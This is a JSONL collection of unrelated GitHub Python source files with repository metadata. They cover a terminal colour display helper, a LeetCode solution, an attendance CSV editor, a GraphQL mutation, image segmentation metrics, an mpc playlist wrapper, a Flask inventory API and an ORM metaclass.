+{"seq_id":"16946761587","text":"import contextlib\n\nimport click\nimport sty\n\nimport xthematic.colors\nimport xthematic.themes\nfrom xthematic.term import TERMINAL_COLORS\n\n\nclass ColoredContext:\n all_color_identifiers = set(xthematic.colors.ColorIdentifier.all_four_bit_colors())\n\n def __init__(self):\n self.used_color_ids = set()\n self.overwritten_colors = {}\n\n @property\n def registered_ids(self):\n return set(self.overwritten_colors.keys())\n\n @property\n def free(self):\n return self.all_color_identifiers - self.registered_ids - self.used_color_ids\n\n def register_color(self, color):\n if len(self.free) < 0:\n raise RuntimeError(\"cannot register any more color values.\")\n elif color in xthematic.term.TERMINAL_COLORS.values():\n raise ValueError(f\"color {color} is already defined in the terminal's colors\")\n\n id_ = self.free.pop()\n self.overwritten_colors[id_] = xthematic.term.TERMINAL_COLORS[id_]\n try:\n xthematic.term.TERMINAL_COLORS[id_] = color\n except Exception:\n del self.overwritten_colors[id_]\n raise\n\n def unregister_color(self, color):\n id_ = self.id_for_color(color)\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n del self.overwritten_colors[id_]\n self.used_color_ids.remove(id_)\n\n def unregister_all(self):\n for id_ in self.registered_ids:\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n self.overwritten_colors.clear()\n self.used_color_ids.clear()\n\n def format_string_for_ids(self, fg_id=None, bg_id=None):\n s = '{}' + sty.rs.all\n if fg_id:\n s = sty.fg(fg_id.four_bit_color_name) + s\n self.used_color_ids.add(fg_id)\n if bg_id:\n s = sty.bg(bg_id.four_bit_color_name) + s\n self.used_color_ids.add(bg_id)\n return s\n\n def format_string_for_colors(self, fg_color=None, bg_color=None):\n fg_id = self.id_for_color(fg_color) if fg_color else None\n bg_id = self.id_for_color(bg_color) if bg_color else None\n return self.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n\n @staticmethod\n def printable_colors():\n return xthematic.term.TERMINAL_COLORS.values()\n\n @staticmethod\n def id_for_color(color):\n for id_, value in xthematic.term.TERMINAL_COLORS.items():\n if value == color:\n return id_\n raise ValueError(f\"there is no registered {color}\")\n\n\nclass ColoredStream:\n def __init__(self, context):\n self.context = context\n\n @classmethod\n @contextlib.contextmanager\n def open(cls):\n cc = ColoredContext()\n yield cls(context=cc)\n cc.unregister_all()\n\n def echo_by_id(self, text, nl=True, fg_id=None, bg_id=None):\n s = self.context.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n click.echo(s.format(text), nl=nl)\n\n def echo(self, text, nl=True, fg=None, bg=None):\n if fg and fg not in self.context.printable_colors():\n self.context.register_color(fg)\n if bg and bg not in self.context.printable_colors():\n self.context.register_color(bg)\n s = self.context.format_string_for_colors(fg_color=fg, bg_color=bg)\n click.echo(s.format(text), nl=nl)\n\n\ndef escape_sequence_index_string(fg_id, bg_id):\n fg_bright = int(fg_id.id in range(8, 16))\n return f'{fg_bright};{30+(fg_id.id % 8)};{40+(bg_id.id % 8)}'\n\n\ndef echo_theme(theme_name=None):\n with ColoredStream.open() as stream:\n for row_id in xthematic.colors.ColorIdentifier.all_four_bit_colors():\n for col_id in list(xthematic.colors.ColorIdentifier.all_four_bit_colors())[:8]:\n stream.echo_by_id(text=escape_sequence_index_string(fg_id=row_id, bg_id=col_id),\n nl=False, fg_id=row_id, bg_id=col_id)\n click.echo(' ', nl=False)\n click.echo(nl=True)\n input()\n\n\n","repo_name":"taesko/xthematic","sub_path":"src/xthematic/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"23000275621","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution:\n \n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n dic = {}\n \n for i, num in enumerate(nums):\n dic[num] = i\n \n for i, num in enumerate(nums):\n \n pair = target - num\n \n if pair in dic and dic[pair] != i:\n return [i, dic[pair]]\n","repo_name":"soldambi/code-practice","sub_path":"LeetCode/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27509528006","text":"import csv\nfrom datetime import datetime,date,time,timedelta\n\ntime_format_str = '%H:%M:%S'\ndate_format_str = '%Y-%m-%d'\nnow_format_str = '%Y-%m-%d %H:%M:%S'\nname1 = 'Abigail Peterson'\nname2 = 'Anita Oliver'\ncode_str1 = '041405513376'\ncode_str2 = '041078536769'\n\ndef time_now():\n\tnow = datetime.now().strftime(time_format_str)\n\tnow = str(now)\n\treturn now\n\t\ndef date_now():\n\ttoday = datetime.now().strftime(date_format_str)\n\ttoday = str(today)\n\treturn today\n\t\ndef main():\t\n\twith open('./attendances/'+date_now()+'.csv',mode='r') as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tindex = -1\n\t\tall_line_rev = list(reversed(list(csvreader)))\n\t\tfor row in all_line_rev:\n\t\t\tindex += 1\n\t\t\tif row[1] == code_str1:\n\t\t\t\tbreak\n\t\t\n\t\tall_line_rev[index][3] = 'MLEBU'\n\t\tall_line = list(reversed(all_line_rev))\n\t\t\n\twith open('./attendances/'+date_now()+'.csv',mode='w') as csvfile:\n\t\tpresence_write = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tfor rows in all_line:\n\t\t\tpresence_write.writerow(rows)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\t\t\n# with open('./attendances/'+date_input+'.csv',mode='a') as writing:\n\t\t# presence_write = csv.writer(writing, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t# presence_write.writerow([time_input,id,employee_full,status])\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"bimanjayaaji/rfid-attendance--odoo","sub_path":"_archieved/csv_form.py","file_name":"csv_form.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28192142342","text":"import datetime\n\nimport graphene\nimport sqlalchemy as sa\nfrom graphene import ObjectType\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.db_models import (\n Place,\n SecretPlaceExtra,\n Category,\n ActionsEconomy,\n)\nfrom utils.api_auth import AuthChecker\nfrom utils.config import settings as s\nfrom utils.smp_exceptions import Exc, ExceptionGroupEnum, ExceptionReasonEnum\nfrom ..gql_id import decode_gql_id\nfrom ..gql_types.place_type import PlaceType\nfrom ..service_types.coin_change_object import CoinChange\n\n\nclass PlaceAddition(ObjectType):\n added_place = graphene.Field(type_=PlaceType)\n coin_change = graphene.Field(type_=CoinChange)\n\n\nclass PlaceDataInput(graphene.InputObjectType):\n name = graphene.String(required=True)\n category_id = graphene.String(required=True)\n coordinate_longitude = graphene.Float(required=True)\n coordinate_latitude = graphene.Float(required=True)\n\n address = graphene.String()\n description = graphene.String()\n\n\nclass SecretPlaceExtraInput(graphene.InputObjectType):\n food_suggestion = graphene.String()\n time_suggestion = graphene.String()\n company_suggestion = graphene.String()\n music_suggestion = graphene.String()\n extra_suggestion = graphene.String()\n\n\nclass MutationAddPlace(graphene.Mutation):\n class Arguments:\n place_data = PlaceDataInput()\n secret_place_extra = SecretPlaceExtraInput()\n\n coin_change = graphene.Field(type_=CoinChange)\n new_place = graphene.Field(type_=PlaceType)\n\n @classmethod\n async def mutate(\n cls, root, info, place_data: dict, secret_place_extra: dict | None = None\n ):\n session: AsyncSession = info.context.session\n user_id = await AuthChecker.check_auth_mutation(session=session, info=info)\n possible_actions = await ActionsEconomy.verify_possibility(\n session=session, user_id=user_id\n )\n new_place = await basic_mapper(Place, place_data)\n new_place[Place.owner_id] = user_id\n place_category = (\n await session.execute(\n sa.select(Category.id, Category.name).where(\n Category.id == new_place[Place.category_id]\n )\n )\n ).fetchone()\n\n is_secret_place = place_category.name == s.SECRET_PLACE_NAME\n\n if not is_secret_place and secret_place_extra is not None:\n Exc.value(\n message=\"It is not possible to enter the data of a secret place in a normal place\",\n of_group=ExceptionGroupEnum.BAD_INPUT,\n reasons=ExceptionReasonEnum.INCORRECT_VALUE,\n )\n\n existing_places = (\n await session.execute(\n sa.select(Place.id).where(\n sa.and_(\n Place.owner_id == user_id,\n Place.category_id == place_category.id,\n )\n )\n )\n ).fetchall()\n if existing_places:\n action_name = (\n \"Create new secret place\"\n if is_secret_place\n else \"Create a new place of the same category\"\n )\n else:\n action_name = (\n \"Create first secret place\" if is_secret_place else \"Create a place\"\n )\n # TODO return how much more coins is needed - Ougen\n if not possible_actions[action_name]:\n Exc.low_wallet(\n message=\"Insufficient coins\",\n of_group=ExceptionGroupEnum.BAD_BALANCE,\n reasons=ExceptionReasonEnum.LOW_BALANCE,\n )\n\n # adding a place to db\n if is_secret_place and secret_place_extra:\n new_secret_place_data = await basic_mapper(\n SecretPlaceExtra, secret_place_extra\n )\n secret_place_id = (\n await session.execute(\n sa.insert(SecretPlaceExtra)\n .values(new_secret_place_data)\n .returning(SecretPlaceExtra.id)\n )\n ).scalar()\n else:\n secret_place_id = None\n new_place[Place.secret_extra_id] = secret_place_id\n uploaded_place_id = (\n (\n await session.execute(\n sa.insert(Place).values(new_place).returning(Place.id)\n )\n )\n .fetchone()\n .id\n )\n\n # setting for all other places of the same type on fire\n time_to_decay = datetime.datetime.now() + datetime.timedelta(\n hours=s.PLACE_DECAY_DURATION_HOURS\n )\n # set some places on fire\n await session.execute(\n sa.update(Place)\n .where(\n sa.and_(\n Place.owner_id == user_id,\n Place.id != uploaded_place_id,\n Place.category_id == place_category.id,\n Place.active_due_date.is_(None),\n )\n )\n .values({Place.active_due_date: time_to_decay})\n .returning(Place.id)\n )\n\n coin_change = await ActionsEconomy.execute(\n session=session, action_name=action_name, coin_receiver_user_id=user_id\n )\n return MutationAddPlace(\n coin_change=coin_change,\n new_place=PlaceType.get_node(info, uploaded_place_id),\n )\n\n\nasync def basic_mapper(classtype, value):\n # TODO Document this piece of code - Ougen*\n # TODO remove async pollution here - Ougen*\n new_value = {}\n for attr, attr_val in value.items():\n if \"id\" in attr:\n attr_val = decode_gql_id(attr_val)[1]\n if hasattr(classtype, attr):\n new_value[getattr(classtype, attr)] = attr_val\n return new_value\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"gql/mutations/add_place.py","file_name":"add_place.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"4941342603","text":"import numpy as np\nimport cv2\n\ndef max_contour(inp_img):\n\n norm_image = cv2.normalize(inp_img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,25,255,cv2.THRESH_BINARY)[1]\n\n contours,_ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n max = [0,0,0,0]\n\n for c in contours:\n x,y,w,h = cv2.boundingRect(c)\n\n if w*h > max[2]*max[3]:\n max = [x,y,w,h]\n point1 = (max[0],max[1]+max[3])\n point2 = (max[0]+max[2],max[1])\n\n angle = np.arctan(max[3]/max[2])\n \n return point1, point2, angle\n\ndef pred_needle_img(point1, point2, size=(440, 500)):\n\n zeros = np.zeros(size)\n cv2.line(zeros, point1, point2, (255,255,255), 2)\n \n return zeros\n\ndef inline_BB(point1, point2, shape, a = 15):\n \n x1, y1 = point1\n x2, y2 = point2\n\n zeros = np.zeros(shape)\n cv2.line(zeros, (x1, y1), (x2, y2), (255,255,255), 1)\n\n tan = -1*(y1-y2)/(x1-x2)\n theta = np.arctan(tan)\n\n cos_minus_sin = np.cos(theta) - np.sin(theta)\n\n cos_plus_sin = np.cos(theta) + np.sin(theta)\n\n point1 = [x1-a*cos_minus_sin, y1 + a*cos_plus_sin]\n point2 = [x1-a*cos_plus_sin, y1 - a*cos_minus_sin]\n point3 = [x2 + a*cos_minus_sin, y2 - a*cos_plus_sin]\n point4 = [x2 + a*cos_plus_sin, y2 + a*cos_minus_sin]\n\n pts = np.array([point1, point2, \n point3, point4],\n np.int32)\n\n image = cv2.polylines(zeros, [pts], True, (255,255,255), 1)\n return image\n\ndef max_contour(img):\n norm_image = cv2.normalize(img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,127,255,cv2.THRESH_BINARY)[1]\n\n contours, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n output = np.zeros_like(img)\n if len(contours) != 0:\n c = max(contours, key = cv2.contourArea)\n cv2.drawContours(output, [c], -1, 255, -1)\n\n return output\n\ndef angle_acc(act_angle, pred_angle):\n return (act_angle-pred_angle)**2\n\ndef dist_acc(pred_point1, pred_point2, act_point1, act_point2, size):\n\n center = np.array(size)/2\n\n pred_point1 = np.array(pred_point1)\n pred_point2 = np.array(pred_point2)\n \n pred_dist = np.cross(pred_point2-pred_point1,center-pred_point1)/np.linalg.norm(pred_point2-pred_point1)\n\n act_point1 = np.array(act_point1)\n act_point2 = np.array(act_point2)\n \n act_dist = np.cross(act_point2-act_point1,center-act_point1)/np.linalg.norm(act_point2-act_point1)\n \n return np.square(act_dist-pred_dist)\n\ndef dice_coef(y_true, y_pred):\n\n y_true_f = y_true.flatten()\n y_pred_f = y_pred.flatten()\n intersection = np.sum(y_true_f * y_pred_f)\n smooth = 0.0001\n return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)\n\ndef IOU(act_rect, pred_rect):\n\n intersection = np.logical_and(act_rect, pred_rect)\n union = np.logical_or(act_rect, pred_rect)\n \n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef recall(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fn = np.sum(np.logical_and(act_rect, 1-pred_rect))\n recall = tp/(tp+fn)\n\n return recall\n\ndef precision(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fp = np.sum(np.logical_and(1-act_rect, pred_rect))\n precision = tp/(tp+fp)\n\n return precision\n \ndef F1(precision,recall):\n F1=2*precision*recall/(precision+recall)\n \n return F1","repo_name":"gupta-bhavesh/Curriculum_KD","sub_path":"needle/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"18524626816","text":"import os\nfrom com.common import COLOR\nimport cv2\n\nclass SaveToFrame (object):\n def __init__(self,**kwargs):\n self.frame = kwargs['frame']\n self.f_path = kwargs['path']\n self.f_name = kwargs['filename']\n #self.frame_id = kwargs['frame_id']\n #self.x, self.y = kwargs['x'], kwargs['y']\n #self.s = kwargs['s']\n\n\n\n def create_full_frame(self):\n frame = os.path.join(self.f_path, self.f_name)\n print(COLOR.RED + frame + COLOR.END)\n cv2.imwrite(frame + '.png', self.frame)\n\n\n\n\n\n","repo_name":"igorfed/Annotation_v1","sub_path":"com/common_frame_files.py","file_name":"common_frame_files.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36126047171","text":"#!/usr/bin/env python3\n\n\"\"\"Playlist-manipulating mpc wrapper script.\n\nUsage:\n playlist [options]\n playlist [options] add \n playlist [options] add-from \n playlist [options] add-random \n playlist lyrics []\n playlist [options] pause-after-current []\n playlist repeat-current-once\n playlist -h | --help\n playlist --version\n\nOptions:\n -a, --all Add all items in the directory. Overrides `--number'.\n -h, --help Print this message and exit.\n -l, --filenames Print tracks as filenames instead of the default “artist — title format.\n -n, --number= Add this many items maximum. Set to `all' to add all items in the directory. Defaults to `all' for `add-random', and `1' for `add-from'.\n --version Print version info and exit.\n\"\"\"\n\nimport pathlib\nimport sys\n\nsys.path += ['/opt/py', str(pathlib.Path.home() / 'py')]\n\nimport contextlib\nimport os\nimport random\nimport re\nimport socket\nimport subprocess\n\nimport docopt # PyPI: docopt\nimport mpd # PyPI: python-mpd2\n\nimport syncbin\n\n__version__ = syncbin.__version__\n\nMPD_ROOT = pathlib.Path(os.environ.get('MPD_ROOT', '/Users/fenhl/Music'))\n\ndef client(host=None, port=6600, *, password=None, idle_timeout=None):\n if host is None:\n password, host = os.environ['MPD_HOST'].split('@')\n c = mpd.MPDClient()\n c.connect(host, port)\n if password is not None:\n c.password(password)\n if idle_timeout is not None:\n c.idletimeout = idle_timeout\n return c\n\ndef format_song(song, arguments={}):\n if not arguments.get('--filenames'):\n with contextlib.suppress(KeyError):\n return '{} — {}'.format(song['artist'], song['title'])\n return song['file']\n\nif __name__ == '__main__':\n arguments = docopt.docopt(__doc__, version='playlist from fenhl/syncbin ' + __version__)\n if arguments['add']:\n # add the given path to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n if (MPD_ROOT / path).is_dir():\n track_iterator = (MPD_ROOT / path).iterdir()\n else:\n track_iterator = iter([MPD_ROOT / path])\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n i = 0\n for f in sorted(track_iterator):\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 0\n if arguments['add-from']:\n # add files from the given path's parent, starting with the given path, to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n track_iterator = (MPD_ROOT / path).parent.iterdir()\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n found = False\n i = 0\n for f in sorted(track_iterator):\n if f.name.startswith(path.name):\n found = True\n if found:\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 1\n elif arguments['add-random']:\n tracks = subprocess.run(['mpc', 'ls', arguments['']], stdout=subprocess.PIPE, encoding='utf-8', check=True).splitlines()\n random.shuffle(tracks)\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (1 if arguments['--number'] is None else int(arguments['--number']))\n for i, track in enumerate(tracks):\n if i >= amount:\n break\n exit_status = subprocess.run(['mpc', 'add', track]).returncode\n if exit_status != 0:\n sys.exit(exit_status)\n elif arguments['lyrics']:\n sys.exit(subprocess.run(['eyeD3', arguments[''] or client().playlistid()[0]['file']]).returncode) #TODO only display lyrics, not other ID3 tags\n elif arguments['pause-after-current']:\n num_tracks = int(arguments['']) if arguments[''] else 1\n c = client(idle_timeout=1)\n for i in range(num_tracks):\n song = c.currentsong()\n print('[....] {}'.format(format_song(song, arguments)), end='\\r[....]', flush=True)\n if i == num_tracks - 1:\n c.single(1)\n try:\n while True:\n progress = min(4, int(5 * float(c.status()['elapsed']) / float(song['time'])))\n print('\\r[{}{}]'.format('=' * progress, '.' * (4 - progress)), end='', flush=True)\n try:\n c.idle('player')\n except socket.timeout:\n c = client(idle_timeout=1)\n if c.currentsong().get('id') != song['id']:\n break\n except KeyboardInterrupt:\n print('\\r[ ^C ] {}'.format(format_song(song, arguments)), flush=True)\n client().single(0)\n sys.exit(1)\n print('\\r[ ok ]', flush=True)\n c.single(0)\n elif arguments['repeat-current-once']:\n current = subprocess.run(['mpc', 'current', '--format=%file%'], stdout=subprocess.PIPE, encoding='utf-8', check=True)[:-1].decode('utf-8')\n sys.exit(subprocess.run(['mpc', 'insert', current]).returncode)\n else:\n c = client()\n for song in c.playlistid():\n if int(song['pos']) > 9999:\n print('[ ** ]', 'playlist truncated')\n break\n print('[{: >4}] {}'.format(int(song['pos']), format_song(song, arguments)))\n","repo_name":"fenhl/syncbin","sub_path":"python/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"7258457492","text":"from flask import Flask, request\nfrom model import db, Inventory\nfrom query_object.itemQO import ItemQO\nfrom query_object.filterQO import FilterQO\nfrom config import Config\n\napp = Flask(__name__)\nconfig = Config()\napp.config['SQLALCHEMY_DATABASE_URI'] = config.DB_PATH\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n request_data = request.get_json()\n itemQo = ItemQO(request_data.get('name', ''),\n request_data.get('category', ''),\n request_data.get('price', ''))\n return Inventory.insert(itemQo)\n\n\n@app.route('/filter', methods=['POST'])\ndef filter():\n request_data = request.get_json()\n filterQo = FilterQO(request_data.get('dt_from', ''),\n request_data.get('dt_to', ''))\n return Inventory.filter(filterQo)\n\n\n@app.route('/category', methods=['POST'])\ndef category():\n request_data = request.get_json()\n return Inventory.categorize(request_data.get('category', ''))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"kingsleylow0327/inventory_management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"19134124233","text":"# JSON is commonly used with data APIs.\n# We can parse JSON into a Python dictionary.\n\nimport json\n\n# Sample JSON\nuserJson = '{\"firstName\": \"Louis\", \"lastName\": \"Higgins\", \"age\": 42}'\n\n# Parse to dictionary\nuser = json.loads(userJson)\n\nprint(user)\nprint(user['firstName'])\n\n# Parse dictionary to JSON\ncar = {'Make': 'Ford', 'Model': 'Mustang', 'Year': 1970}\ncarJson = json.dumps(car)\n\nprint(carJson)","repo_name":"misterjeff/Python","sub_path":"TraversyCrashCourse/pyJson.py","file_name":"pyJson.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32935155782","text":"from collections import OrderedDict\n\nfrom .relmanager import RelManager\nfrom .fields import Field, ForeignKey, OneToOneField\nfrom .utils import tznow\nfrom . import signals\n\n# Architecture\n#\n# This is complicated enough to warrant some explanation.\n#\n# A Model class has a Meta instance.\n#\n# The Fields are instances in the Meta instance.\n#\n# For a given Model, all Field instances are shared since there is only\n# one Meta instance for that Model class. This means that a field can't know\n# it's exact Model instance, only it's parent Model class.\n\n\n# from: http://stackoverflow.com/questions/12006267/how-do-django-models-work\n# from: lib/python2.7/site-packages/django/db/models/base.py\n#\n# remember that `type` is actually a class like `str` and `int`\n# so you can inherit from it\nclass MetaModel(type):\n \"\"\"\n *do not use this class directly*\n\n *code reviews of this class are very welcome*\n\n base class for :class:`alkali.model.Model`.\n\n this complicated metaclass is required to convert a stylized class\n into a useful concrete one. it converts :class:`alkali.fields.Field`\n variables into their base types as attributes on the instantiated\n class.\n\n **Meta**: adds a ``Meta`` class if not already defined in ``Model``\n derived class\n\n **objects**: :class:`alkali.manager.Manager`\n \"\"\"\n\n # this called once per Model _definition_\n # __new__ is the method called before __init__\n # meta_class is _this_ class, aka: MetaModel\n # this makes a new MetaModel instance\n def __new__(meta_class, name, bases, attrs):\n #print \"__new__ cls:\",type(meta_class),meta_class,name\n super_new = super(MetaModel, meta_class).__new__\n\n # Also ensure initialization is only performed for subclasses of Model\n # (excluding Model class itself). This keeps all of Models attrs intact.\n if not any( map( lambda b: isinstance(b, MetaModel), bases ) ):\n new_class = super_new(meta_class, name, bases, attrs)\n return new_class\n\n # new_class is an instance of 'name' (aka Model) whose type is MetaModel\n # print \"new_class\", type(new_class), new_class\n # new_class \n new_class = super_new(meta_class, name, bases, {})\n new_class._add_meta( attrs )\n new_class._add_fields()\n new_class._add_manager()\n new_class._add_relmanagers()\n new_class._add_exceptions()\n\n # put the rest of the attributes (methods and properties)\n # defined in the Model derived class into the \"new\" Model\n for name, attr in attrs.items():\n setattr(new_class, name, attr)\n\n signals.model_creation.send(meta_class, model=new_class)\n\n return new_class\n\n def _add_manager( new_class ):\n from .manager import Manager\n setattr( new_class, 'objects', Manager(new_class) )\n\n def _add_relmanagers( new_class ):\n \"\"\"\n if this class has foreign keys then we need to add the\n reverse lookup into the *other* model\n \"\"\"\n for name, field in new_class.Meta.fields.items():\n if not isinstance(field, ForeignKey):\n continue\n\n # note the name=name in the lambda, this is vital to capture\n # the current value of name and not the last of the loop\n # more info: http://stackoverflow.com/questions/2295290\n rel_manager = property(\n lambda fm_instance, name=name: RelManager(fm_instance, new_class, name)\n )\n set_name = \"{}_set\".format(new_class.__name__).lower()\n setattr( field.foreign_model, set_name, rel_manager )\n\n signals.pre_delete.connect(\n new_class.objects.cb_delete_foreign,\n sender=field.foreign_model)\n\n if isinstance(field, OneToOneField):\n signals.post_save.connect(\n new_class.objects.cb_create_foreign,\n sender=field.foreign_model)\n\n def _add_exceptions( new_class ):\n from .model import ObjectDoesNotExist\n\n # dynamically create a new class types\n DoesNotExist = type('DoesNotExist', (ObjectDoesNotExist,), {} )\n EmptyPrimaryKey = type('EmptyPrimaryKey', (Exception,), {} )\n MultipleObjectsReturned = type('MultipleObjectsReturned', (Exception,), {} )\n\n setattr( new_class, 'ObjectDoesNotExist', ObjectDoesNotExist )\n setattr( new_class, 'DoesNotExist', DoesNotExist )\n setattr( new_class, 'EmptyPrimaryKey', EmptyPrimaryKey )\n setattr( new_class, 'MultipleObjectsReturned', MultipleObjectsReturned )\n\n def _add_meta( new_class, attrs ):\n\n def _get_fields( attrs ):\n return [(k, v) for k, v in attrs.items() if isinstance(v, Field)]\n\n def _get_field_order(attrs):\n \"\"\"\n returns field names in the order they were defined in the class\n \"\"\"\n fields = _get_fields(attrs)\n fields.sort(key=lambda e: e[1]._order)\n return [k for k, _ in fields]\n\n class Object():\n pass\n\n # Meta is an instance in Model class\n # all following properties on the Meta class, not instance\n meta = attrs.pop( 'Meta', Object )\n setattr( new_class, 'Meta', meta() )\n\n if not hasattr(meta, 'filename'):\n meta.filename = None\n\n if not hasattr(meta, 'storage'):\n meta.storage = None\n\n if not hasattr(meta, 'ordering'):\n meta.ordering = _get_field_order(attrs)\n\n meta.field_filter = lambda self, field_type: \\\n [n for n, f in self.fields.items() if isinstance(f, field_type)]\n\n # don't let user miss a field if they've defined Meta.ordering\n assert len(meta.ordering) == len(_get_fields(attrs)), \\\n \"missing/extra fields defined in Meta.ordering\"\n\n # put the fields into the meta class\n # meta.ordering contains field names, attrs contains Field types\n meta.fields = OrderedDict()\n for field in meta.ordering:\n meta.fields[field] = attrs.pop(field)\n delattr( meta.fields[field], '_order' )\n\n # make sure 'pk' isn't a field name, etc\n for d in ['pk']:\n assert d not in meta.fields\n\n # you can set a property on a class but it will only be called on an instance\n # I'd prefer this to be a read-only property but I guess that can't happen\n #\n # note: don't use a dict comprehension because interim dict will have keys\n # inserted in random order\n meta.pk_fields = OrderedDict(\n [(name, field) for name, field in meta.fields.items() if field.primary_key]\n )\n\n # monkey patch stupid fucking iterators\n meta.pk_fields._keys = meta.pk_fields.keys\n meta.pk_fields.keys = lambda: list(meta.pk_fields._keys())\n meta.pk_fields._values = meta.pk_fields.values\n meta.pk_fields.values = lambda: list(meta.pk_fields._values())\n\n meta.fields._keys = meta.fields.keys\n meta.fields.keys = lambda: list(meta.fields._keys())\n meta.fields._values = meta.fields.values\n meta.fields.values = lambda: list(meta.fields._values())\n\n if len(meta.fields):\n assert len(meta.pk_fields) > 0, \"no primary_key defined in fields\"\n\n def _add_fields( new_class ):\n \"\"\"\n put the Field reference into new_class\n \"\"\"\n meta = new_class.Meta\n\n # add properties to field\n for name, field in meta.fields.items():\n field._name = name\n fget = lambda self: getattr(self, '_name')\n setattr( field.__class__, 'name', property(fget=fget) )\n\n field._model = new_class\n fget = lambda self: getattr(self, '_model')\n setattr( field.__class__, 'model', property(fget=fget) )\n\n fget = lambda self: self.model.Meta\n setattr( field.__class__, 'meta', property(fget=fget) )\n\n # put fields in model\n for name, field in meta.fields.items():\n # make magic property model.fieldname_field that returns Field object\n fget = lambda self, name=name: self.Meta.fields[name]\n setattr( new_class, name + '__field', property(fget=fget) )\n\n # set the Field descriptor object on the model class\n # which makes it accessable on the model instance\n #\n # the field can't be a property to Meta.fields[name]\n # because then the descriptor-ness is lost and a normal\n # getattr is called on the model instance\n setattr( new_class, name, field )\n\n # creates a new instance of derived model, this is called each\n # time a Model instance is created\n def __call__(cls, *args, **kw):\n obj = cls.__new__(cls, *args)\n\n if 'pk' in kw:\n assert len(cls.Meta.pk_fields) == 1, \"can't currently set compound primary key via kwargs\"\n\n field_name = cls.Meta.pk_fields.keys()[0]\n assert field_name not in kw, \"can't pass in 'pk' and actual pk field name\"\n\n value = kw.pop('pk')\n kw[field_name] = value\n\n # put field values (int,str,etc) into model instance\n for name, field in cls.Meta.fields.items():\n if getattr(field, 'auto_now', False):\n value = kw.pop(name, tznow().isoformat())\n elif getattr(field, 'auto_now_add', False):\n value = kw.pop(name, tznow().isoformat())\n else:\n # THINK: this somewhat duplicates Field.__set__ code\n value = kw.pop(name, field.default_value)\n\n value = field.cast(value)\n\n # store the actual value in the model's __dict__, used by Field.__get__\n obj.__dict__[name] = value\n\n obj._dirty = False\n obj.__init__(*args, **kw)\n\n return obj\n","repo_name":"kneufeld/alkali","sub_path":"alkali/metamodel.py","file_name":"metamodel.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"39"}
